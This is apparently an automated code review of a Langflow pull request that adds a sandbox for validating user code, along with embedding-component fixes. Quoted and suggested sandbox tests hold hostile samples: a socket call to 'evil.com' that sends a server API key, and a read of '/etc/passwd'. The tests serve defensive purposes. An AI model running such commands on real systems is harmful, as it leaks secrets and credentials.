-            name="allow_dangerous_deserialization",
-            display_name="Allow Dangerous Deserialization",
-            ...
-            value=True,
-        ),
+        BoolInput(
+            name="allow_dangerous_deserialization",
+            display_name="Allow Dangerous Deserialization",
+            ...
+            value=False,
+        ),
If you must load untrusted indexes, gate with environment flag and warn prominently in UI.

🧹 Nitpick comments (6)

src/backend/tests/unit/utils/test_validate.py (1)
54-151: Consider adding dedicated sandbox security tests.

The PR introduces a security sandbox to block dangerous operations, but this test file doesn't appear to include tests that specifically verify sandbox blocking behavior. Consider adding tests for:

Blocked operations - Verify that dangerous operations are blocked:

File system access (open(), os.remove(), os.system())

Subprocess execution (subprocess.run(), os.popen())

Network operations (socket, urllib, requests)

Module imports (__import__, importlib with dangerous modules)

Allowed operations - Verify safe operations still work:

Standard math/string operations

Safe stdlib modules (math, json, typing, etc.)

Global setting - The AI summary mentions "a new global setting controls whether dangerous code operations are permitted during validation." Add tests to verify:

Setting can enable/disable dangerous operations

Setting is respected by validation logic

Error handling - Verify appropriate errors are raised when blocked operations are attempted

Example test structure:
class TestSandboxSecurity:
    """Test cases for sandbox security restrictions."""
    
    def test_blocks_file_operations(self):
        """Test that file operations are blocked in sandbox."""
        code = '''
def dangerous_func():
    with open('/etc/passwd', 'r') as f:
        return f.read()
'''
        result = validate_code(code)
        assert len(result["function"]["errors"]) > 0
        assert "blocked" in str(result["function"]["errors"]).lower() or "not allowed" in str(result["function"]["errors"]).lower()
    
    def test_allows_safe_operations(self):
        """Test that safe operations are allowed."""
        code = '''
import math
import json

def safe_func(x):
    return json.dumps({"result": math.sqrt(x)})
'''
        result = validate_code(code)
        assert result["imports"]["errors"] == []
        assert result["function"]["errors"] == []
src/lfx/src/lfx/services/settings/base.py (1)

339-349: Config flag wiring for dangerous validation looks consistent

The new allow_dangerous_code_validation flag is sane: defaulting to False, clearly documented, and aligned with env_prefix="LANGFLOW_" so LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION works as described. One thing to be aware of: the sandbox currently reads this env var once at import time, so changing this setting at runtime via Settings won’t affect ALLOW_DANGEROUS_CODE without a restart. If you expect dynamic toggling, wiring the sandbox flag through Settings (or re-reading on demand) would help, otherwise this behavior is fine as a static boot‑time switch.
src/lfx/tests/unit/custom/test_sandbox_security.py (3)
3-13: Clarify relationship between namespace isolation and dangerous‑code flag

The module docstring currently states that sandboxed code can access filesystem, env, network, and commands without qualification, but execute_in_sandbox is documented as blocking these by default unless LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true is set. It would be clearer (and less misleading for future readers) to explicitly mention that this “CAN access” behavior assumes the dangerous‑code flag is enabled, and that by default those operations are blocked while namespace isolation still applies.

217-237: Avoid real outbound network connections in tests

In test_sandbox_cannot_exfiltrate_secrets_via_network, the sandboxed code calls:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('evil.com', 1337))
s.send(server_api_key.encode())
Even though you intend a NameError on server_api_key, the socket.connect happens before that lookup, so the test will attempt a real outbound TCP connection to evil.com. This can make tests slow, flaky, or surprising in constrained CI environments.

You can keep the exfiltration intent while avoiding actual network calls by reordering or simplifying:
-def test():
-    # Code CAN make network requests
-    # But code CANNOT access server_api_key to send
-    # If isolation is broken, we could do: socket.send(server_api_key.encode())
-    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-    s.connect(('evil.com', 1337))
-    s.send(server_api_key.encode())  # Try to send server secret
-    s.close()
-    return 'sent'
+def test():
+    # Code COULD make network requests, but here we focus on the secret access.
+    # The NameError on server_api_key should occur before any actual network I/O.
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    # No real connect; just reference the would‑be secret.
+    s.send(server_api_key.encode())  # Try to send server secret
+    s.close()
+    return 'sent'
This still proves that sandboxed code cannot obtain server_api_key, without touching the network.

252-285: Test name/docstring don’t match behavior in test_sandbox_cannot_access_imported_server_modules_state

The test name and docstring say it verifies that sandboxed code “gets fresh module instances, not server’s module state”, but the inline comments and assertion now acknowledge that json is actually shared and only check that result is a str. As written, the test does not meaningfully validate isolation of imported module state.

Either:

Align the behavior with the name/docstring, e.g. assert that result reflects unmodified json.dumps, or

Rename the test and update comments to describe the actual property you care about (e.g., “sandbox can import and use json even if server mutates it; isolation is about Python variables, not module state”), and simplify the setup.

Cleaning this up will make the security guarantees and limitations around module‑level state much clearer for future maintainers.
src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (1)
2231-2249: Guardrail: validate truncate_input_tokens before passing to SDK.

Prevent invalid/negative values from reaching the IBM params.

Within build_embeddings IBM branch:
-            params = {
-                EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,
+            safe_trunc = max(0, int(self.truncate_input_tokens or 0))
+            params = {
+                EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: safe_trunc,
                 EmbedTextParamsMetaNames.RETURN_OPTIONS: {"input_text": self.input_text},
             }

📜 Review details

Configuration used: Path: .coderabbit.yaml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 6f6c9a7 and b574590.

⛔ Files ignored due to path filters (1)

uv.lock is excluded by !**/*.lock

📒 Files selected for processing (8)

src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (5 hunks)
src/backend/tests/unit/api/v1/test_validate.py (1 hunks)
src/backend/tests/unit/utils/test_validate.py (1 hunks)
src/lfx/src/lfx/custom/sandbox.py (1 hunks)
src/lfx/src/lfx/custom/validate.py (2 hunks)
src/lfx/src/lfx/services/settings/base.py (1 hunks)
src/lfx/tests/unit/custom/test_sandbox_isolation.py (1 hunks)
src/lfx/tests/unit/custom/test_sandbox_security.py (1 hunks)

🧰 Additional context used

🧬 Code graph analysis (3)

src/lfx/tests/unit/custom/test_sandbox_isolation.py (1)

src/lfx/src/lfx/custom/sandbox.py (1)

execute_in_sandbox (179-242)

src/lfx/tests/unit/custom/test_sandbox_security.py (1)

src/lfx/src/lfx/custom/sandbox.py (1)

execute_in_sandbox (179-242)

src/lfx/src/lfx/custom/validate.py (1)

src/lfx/src/lfx/custom/sandbox.py (3)

create_isolated_import (142-176)

execute_in_sandbox (179-242)

isolated_import (152-174)

🪛 GitHub Actions: Ruff Style Check

src/backend/tests/unit/api/v1/test_validate.py

[error] 139-139: F841 Local variable result is assigned to but never used.

🪛 GitHub Check: Ruff Style Check (3.13)

src/backend/tests/unit/api/v1/test_validate.py

[failure] 139-139: Ruff (F841)
src/backend/tests/unit/api/v1/test_validate.py:139:5: F841 Local variable result is assigned to but never used

src/lfx/src/lfx/custom/sandbox.py

[failure] 161-162: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:161:21: EM102 Exception must not use an f-string literal, assign to variable first

[failure] 160-163: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:160:23: TRY003 Avoid specifying long messages outside the exception class

[failure] 135-135: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:135:34: EM102 Exception must not use an f-string literal, assign to variable first

[failure] 135-135: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:135:19: TRY003 Avoid specifying long messages outside the exception class

[failure] 129-129: Ruff (E501)
src/lfx/src/lfx/custom/sandbox.py:129:121: E501 Line too long (121 > 120)

[failure] 129-129: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:129:21: EM102 Exception must not use an f-string literal, assign to variable first

[failure] 128-130: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:128:23: TRY003 Avoid specifying long messages outside the exception class

[failure] 105-108: Ruff (SIM105)
src/lfx/src/lfx/custom/sandbox.py:105:13: SIM105 Use contextlib.suppress(AttributeError) instead of try-except-pass

[failure] 17-17: Ruff (N818)
src/lfx/src/lfx/custom/sandbox.py:17:7: N818 Exception name SecurityViolation should be named with an Error suffix

🪛 Gitleaks (8.29.0)

src/lfx/tests/unit/custom/test_sandbox_security.py

[high] 29-29: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)

[high] 63-63: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)

⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (4)

GitHub Check: Run Frontend Tests / Playwright Tests - Shard 27/40
GitHub Check: Test Docker Images / Test docker images
GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 1
GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 4

🔇 Additional comments (4)

src/backend/tests/unit/utils/test_validate.py (1)

70-75: I need to examine the actual tests in the file to understand their context and expectations.

Now I need to examine the actual test file structure to determine if the change is part of a broader, consistent update or if there's genuinely an inconsistency.

Based on the shell script output and web search, I have sufficient evidence. The output shows that Langflow is a powerful platform for building and deploying AI-powered agents and workflows, and the sandbox implementation with blocking of dangerous operations by default is confirmed. Let me generate the rewritten review comment.

Clarify test coverage inconsistency and file path.

The script output confirms that the sandbox implementation blocks dangerous operations (file I/O, network, subprocess) by default, with an environment variable LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION available to override this behavior.

However, I cannot locate the specific file path src/backend/tests/unit/utils/test_validate.py in the sandbox-related test results. The script output shows comprehensive sandbox tests at src/lfx/tests/unit/custom/test_sandbox_security.py and src/lfx/tests/unit/custom/test_sandbox_isolation.py, plus API endpoint tests at src/backend/tests/unit/api/v1/test_validate.py.

The tests at src/backend/tests/unit/api/v1/test_validate.py (lines 84, 108) explicitly verify that dangerous operations ARE blocked by default, which aligns with the change at lines 70-75 to use safe imports. If tests at other line ranges in a utils test file still reference os/sys without apparent sandbox restrictions, they may be:

Testing exception scenarios where blocking is expected

Running under an environment with the override flag enabled

Testing different code paths than the validate endpoint

Please confirm:

Is the file path src/backend/tests/unit/utils/test_validate.py correct, or has it been reorganized?

What do tests at lines 126-134, 270-276, 501-510 verify—sandbox blocking behavior or success cases?

src/lfx/src/lfx/custom/validate.py (1)

11-12: Sandbox integration in validate_code looks solid

Using create_isolated_import for both ast.Import and ast.ImportFrom and then running each FunctionDef through execute_in_sandbox with a constrained Langflow execution context gives you:

Blocked dangerous modules at import time ( surfaced as structured import errors ),

Definition‑time evaluation (decorators / default args) inside the sandbox, and

No leakage of server globals or real __builtins__ into user code.

The _create_langflow_execution_context fallback stubs also keep validation robust when optional Langflow modules aren’t importable. Overall this wiring matches the intended security model of the /validate/code endpoint and looks correct.

Also applies to: 51-88, 93-150

src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (2)

2018-2019: All IBM SDK and LangChain‑IBM signatures verified as correct.

The web search confirms that your code correctly uses:

Credentials(api_key=..., url=...) with ibm_watsonx_ai 1.4.x

EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS and RETURN_OPTIONS.input_text for text embedding parameters

WatsonxEmbeddings with model_id, params, watsonx_client (pre-built APIClient), and project_id in langchain-ibm 0.3.19

All parameters and signatures match the documented patterns for the versions pinned in your dependencies.

1859-1866: Dependency versions verified and consistent.

Verification confirms all declared versions (requests 2.32.5, ibm_watsonx_ai 1.4.2, langchain_ibm 0.3.19) are:

Properly pinned in the JSON starter project configuration

Consistent with pyproject.toml constraints (requests>=2.32.0, ibm-watsonx-ai>=1.3.1,<2.0.0, langchain-ibm>=0.3.8)

Mutually compatible with no conflicts detected

Compatible with project's Python requirement (>=3.10,<3.14)

coderabbitai · 2025-11-24T01:30:33Z

src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json

+                "value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n    IBM_WATSONX_URLS,\n    WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n    BoolInput,\n    DictInput,\n    DropdownInput,\n    FloatInput,\n    IntInput,\n    MessageTextInput,\n    SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n    display_name = \"Embedding Model\"\n    description = \"Generate embeddings using a specified provider.\"\n    documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n    icon = \"binary\"\n    name = \"EmbeddingModel\"\n    category = \"models\"\n\n    inputs = [\n        DropdownInput(\n            name=\"provider\",\n            display_name=\"Model Provider\",\n            options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n            value=\"OpenAI\",\n            info=\"Select the embedding model provider\",\n            real_time_refresh=True,\n            options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n        ),\n        MessageTextInput(\n            name=\"api_base\",\n            display_name=\"API Base URL\",\n            info=\"Base URL for the API. Leave empty for default.\",\n            advanced=True,\n        ),\n        MessageTextInput(\n            name=\"ollama_base_url\",\n            display_name=\"Ollama API URL\",\n            info=f\"Endpoint of the Ollama API (Ollama only). Defaults to {DEFAULT_OLLAMA_URL}\",\n            value=DEFAULT_OLLAMA_URL,\n            show=False,\n            real_time_refresh=True,\n            load_from_db=True,\n        ),\n        DropdownInput(\n            name=\"base_url_ibm_watsonx\",\n            display_name=\"watsonx API Endpoint\",\n            info=\"The base URL of the API (IBM watsonx.ai only)\",\n            options=IBM_WATSONX_URLS,\n            value=IBM_WATSONX_URLS[0],\n            show=False,\n            real_time_refresh=True,\n        ),\n        DropdownInput(\n            name=\"model\",\n            display_name=\"Model Name\",\n            options=OPENAI_EMBEDDING_MODEL_NAMES,\n            value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n            info=\"Select the embedding model to use\",\n            real_time_refresh=True,\n            refresh_button=True,\n        ),\n        SecretStrInput(\n            name=\"api_key\",\n            display_name=\"OpenAI API Key\",\n            info=\"Model Provider API key\",\n            required=True,\n            show=True,\n            real_time_refresh=True,\n        ),\n        # Watson-specific inputs\n        MessageTextInput(\n            name=\"project_id\",\n            display_name=\"Project ID\",\n            info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n            show=False,\n        ),\n        IntInput(\n            name=\"dimensions\",\n            display_name=\"Dimensions\",\n            info=\"The number of dimensions the resulting output embeddings should have. \"\n            \"Only supported by certain models.\",\n            advanced=True,\n        ),\n        IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n        FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n        IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n        BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n        DictInput(\n            name=\"model_kwargs\",\n            display_name=\"Model Kwargs\",\n            advanced=True,\n            info=\"Additional keyword arguments to pass to the model.\",\n        ),\n        IntInput(\n            name=\"truncate_input_tokens\",\n            display_name=\"Truncate Input Tokens\",\n            advanced=True,\n            value=200,\n            show=False,\n        ),\n        BoolInput(\n            name=\"input_text\",\n            display_name=\"Include the original text in the output\",\n            value=True,\n            advanced=True,\n            show=False,\n        ),\n    ]\n\n    @staticmethod\n    def fetch_ibm_models(base_url: str) -> list[str]:\n        \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n        try:\n            endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n            params = {\n                \"version\": \"2024-09-16\",\n                \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n            }\n            response = requests.get(endpoint, params=params, timeout=10)\n            response.raise_for_status()\n            data = response.json()\n            models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n            return sorted(models)\n        except Exception:  # noqa: BLE001\n            logger.exception(\"Error fetching models\")\n            return WATSONX_EMBEDDING_MODEL_NAMES\n\n    def build_embeddings(self) -> Embeddings:\n        provider = self.provider\n        model = self.model\n        api_key = self.api_key\n        api_base = self.api_base\n        base_url_ibm_watsonx = self.base_url_ibm_watsonx\n        ollama_base_url = self.ollama_base_url\n        dimensions = self.dimensions\n        chunk_size = self.chunk_size\n        request_timeout = self.request_timeout\n        max_retries = self.max_retries\n        show_progress_bar = self.show_progress_bar\n        model_kwargs = self.model_kwargs or {}\n\n        if provider == \"OpenAI\":\n            if not api_key:\n                msg = \"OpenAI API key is required when using OpenAI provider\"\n                raise ValueError(msg)\n            return OpenAIEmbeddings(\n                model=model,\n                dimensions=dimensions or None,\n                base_url=api_base or None,\n                api_key=api_key,\n                chunk_size=chunk_size,\n                max_retries=max_retries,\n                timeout=request_timeout or None,\n                show_progress_bar=show_progress_bar,\n                model_kwargs=model_kwargs,\n            )\n\n        if provider == \"Ollama\":\n            try:\n                from langchain_ollama import OllamaEmbeddings\n            except ImportError:\n                try:\n                    from langchain_community.embeddings import OllamaEmbeddings\n                except ImportError:\n                    msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n                    raise ImportError(msg) from None\n\n            transformed_base_url = transform_localhost_url(ollama_base_url)\n\n            # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n            if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n                # Strip /v1 suffix and log warning\n                transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n                logger.warning(\n                    \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n                    \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n                    \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. \"\n                    \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n                )\n\n            return OllamaEmbeddings(\n                model=model,\n                base_url=transformed_base_url or \"http://localhost:11434\",\n                **model_kwargs,\n            )\n\n        if provider == \"IBM watsonx.ai\":\n            try:\n                from langchain_ibm import WatsonxEmbeddings\n            except ImportError:\n                msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n                raise ImportError(msg) from None\n\n            if not api_key:\n                msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n                raise ValueError(msg)\n\n            project_id = self.project_id\n\n            if not project_id:\n                msg = \"Project ID is required for IBM watsonx.ai provider\"\n                raise ValueError(msg)\n\n            from ibm_watsonx_ai import APIClient, Credentials\n\n            credentials = Credentials(\n                api_key=self.api_key,\n                url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n            )\n\n            api_client = APIClient(credentials)\n\n            params = {\n                EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n                EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n            }\n\n            return WatsonxEmbeddings(\n                model_id=model,\n                params=params,\n                watsonx_client=api_client,\n                project_id=project_id,\n            )\n\n        msg = f\"Unknown provider: {provider}\"\n        raise ValueError(msg)\n\n    async def update_build_config(\n        self, build_config: dotdict, field_value: Any, field_name: str | None = None\n    ) -> dotdict:\n        if field_name == \"provider\":\n            if field_value == \"OpenAI\":\n                build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n                build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n                build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n                build_config[\"api_key\"][\"required\"] = True\n                build_config[\"api_key\"][\"show\"] = True\n                build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n                build_config[\"api_base\"][\"advanced\"] = True\n                build_config[\"api_base\"][\"show\"] = True\n                build_config[\"ollama_base_url\"][\"show\"] = False\n                build_config[\"project_id\"][\"show\"] = False\n                build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n                build_config[\"truncate_input_tokens\"][\"show\"] = False\n                build_config[\"input_text\"][\"show\"] = False\n            elif field_value == \"Ollama\":\n                build_config[\"ollama_base_url\"][\"show\"] = True\n\n                if await is_valid_ollama_url(url=self.ollama_base_url):\n                    try:\n                        models = await get_ollama_models(\n                            base_url_value=self.ollama_base_url,\n                            desired_capability=DESIRED_CAPABILITY,\n                            json_models_key=JSON_MODELS_KEY,\n                            json_name_key=JSON_NAME_KEY,\n                            json_capabilities_key=JSON_CAPABILITIES_KEY,\n                        )\n                        build_config[\"model\"][\"options\"] = models\n                        build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n                    except ValueError:\n                        build_config[\"model\"][\"options\"] = []\n                        build_config[\"model\"][\"value\"] = \"\"\n                else:\n                    build_config[\"model\"][\"options\"] = []\n                    build_config[\"model\"][\"value\"] = \"\"\n                build_config[\"truncate_input_tokens\"][\"show\"] = False\n                build_config[\"input_text\"][\"show\"] = False\n                build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n                build_config[\"api_key\"][\"required\"] = False\n                build_config[\"api_key\"][\"show\"] = False\n                build_config[\"api_base\"][\"show\"] = False\n                build_config[\"project_id\"][\"show\"] = False\n                build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n            elif field_value == \"IBM watsonx.ai\":\n                build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n                build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n                build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n                build_config[\"api_key\"][\"required\"] = True\n                build_config[\"api_key\"][\"show\"] = True\n                build_config[\"api_base\"][\"show\"] = False\n                build_config[\"ollama_base_url\"][\"show\"] = False\n                build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n                build_config[\"project_id\"][\"show\"] = True\n                build_config[\"truncate_input_tokens\"][\"show\"] = True\n                build_config[\"input_text\"][\"show\"] = True\n        elif field_name == \"base_url_ibm_watsonx\":\n            build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n            build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n        elif field_name == \"ollama_base_url\":\n            # # Refresh Ollama models when base URL changes\n            # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n            # Use field_value if provided, otherwise fall back to instance attribute\n            ollama_url = self.ollama_base_url\n            if await is_valid_ollama_url(url=ollama_url):\n                try:\n                    models = await get_ollama_models(\n                        base_url_value=ollama_url,\n                        desired_capability=DESIRED_CAPABILITY,\n                        json_models_key=JSON_MODELS_KEY,\n                        json_name_key=JSON_NAME_KEY,\n                        json_capabilities_key=JSON_CAPABILITIES_KEY,\n                    )\n                    build_config[\"model\"][\"options\"] = models\n                    build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n                except ValueError:\n                    await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n                    build_config[\"model\"][\"options\"] = []\n                    build_config[\"model\"][\"value\"] = \"\"\n\n        elif field_name == \"model\" and self.provider == \"Ollama\":\n            ollama_url = self.ollama_base_url\n            if await is_valid_ollama_url(url=ollama_url):\n                try:\n                    models = await get_ollama_models(\n                        base_url_value=ollama_url,\n                        desired_capability=DESIRED_CAPABILITY,\n                        json_models_key=JSON_MODELS_KEY,\n                        json_name_key=JSON_NAME_KEY,\n                        json_capabilities_key=JSON_CAPABILITIES_KEY,\n                    )\n                    build_config[\"model\"][\"options\"] = models\n                except ValueError:\n                    await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n                    build_config[\"model\"][\"options\"] = []\n\n        return build_config\n"
              },


🛠️ Refactor suggestion | 🟠 Major

Avoid blocking calls and duplicate fetches when listing IBM models.

fetch_ibm_models uses synchronous requests inside async update_build_config and is invoked twice for the same value. Offload to a thread and fetch once to prevent event‑loop stalls and redundant I/O.

Apply this minimal change inside the EmbeddingModelComponent code block:

+import asyncio @@ - elif field_value == "IBM watsonx.ai": - build_config["model"]["options"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx) - build_config["model"]["value"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0] + elif field_value == "IBM watsonx.ai": + models = await asyncio.to_thread(self.fetch_ibm_models, base_url=self.base_url_ibm_watsonx) + build_config["model"]["options"] = models + build_config["model"]["value"] = (models[0] if models else "") @@ - elif field_name == "base_url_ibm_watsonx": - build_config["model"]["options"] = self.fetch_ibm_models(base_url=field_value) - build_config["model"]["value"] = self.fetch_ibm_models(base_url=field_value)[0] + elif field_name == "base_url_ibm_watsonx": + models = await asyncio.to_thread(self.fetch_ibm_models, base_url=field_value) + build_config["model"]["options"] = models + build_config["model"]["value"] = (models[0] if models else "")

Committable suggestion skipped: line range outside the PR's diff.

🤖 Prompt for AI Agents

In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json around lines 2018-2019, fetch_ibm_models is synchronous and called twice in update_build_config causing event-loop blocking and duplicate I/O; change update_build_config to offload the synchronous fetch to a thread via asyncio.to_thread (or asyncio.get_running_loop().run_in_executor) and call it only once per branch, e.g. await asyncio.to_thread(self.fetch_ibm_models, base_url=value) store the returned list in a variable, then set build_config["model"]["options"] = models and build_config["model"]["value"] = models[0] if models else "" instead of calling fetch_ibm_models twice; add an import for asyncio at top if missing.

⚠️ Potential issue | 🟠 Major

Fix: use the updated value in Ollama base URL refresh.

The ollama_base_url handler ignores field_value, risking stale model lists.

Apply:

- elif field_name == "ollama_base_url": + elif field_name == "ollama_base_url": @@ - ollama_url = self.ollama_base_url + ollama_url = field_value or self.ollama_base_url

📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change

"value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. \"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n 